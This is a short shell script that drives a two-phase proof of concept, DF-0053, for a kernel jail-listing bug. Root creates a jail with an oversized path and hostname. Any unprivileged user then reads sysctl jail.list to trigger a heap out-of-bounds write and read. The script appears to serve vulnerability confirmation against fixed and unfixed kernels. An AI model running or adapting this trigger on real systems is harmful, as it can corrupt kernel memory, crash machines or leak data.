DF-0053 / run.sh
#!/bin/sh # DF-0053 PoC run - two-phase. # # Phase 1 (root): create a jail with a deep chroot path + max hostname + # a few IPs, so sysctl_jail_list's per-jail formatted line # ("JID <space> hostname <space> fullpath") exceeds the # 1024-byte per-jail budget -> unsigned underflow -> # heap OOB write + OOB read. # Phase 2 (any unprivileged user): read sysctl jail.list -> trigger the bug. # # Usage: ./run.sh # auto-detect: root does phase 1, user does phase 2 # ./run.sh setup # phase 1 only (root) # ./run.sh trigger # phase 2 only (any user) # # Expected output (bug present): "BUG DF-0053 CONFIRMED: ... OOB READ ..." # Expected output (fixed kernel): "[-] output (N) <= jlssize (N)" and exit 0. set -e cd "$(dirname "$0")" MODE=${1:-auto} if [ "$MODE" = "setup" ] || { [ "$MODE" = "auto" ] && [ "$(id -u)" -eq 0 ]; }; then echo "=== DF-0053 phase 1 (root): provisioning long-path jail ===" sh ./setup_jail_v3.sh 60 4 exit 0 fi echo "=== DF-0053 phase 2 (uid=$(id -u)): triggering jail.list ===" ./jail_list_trigger |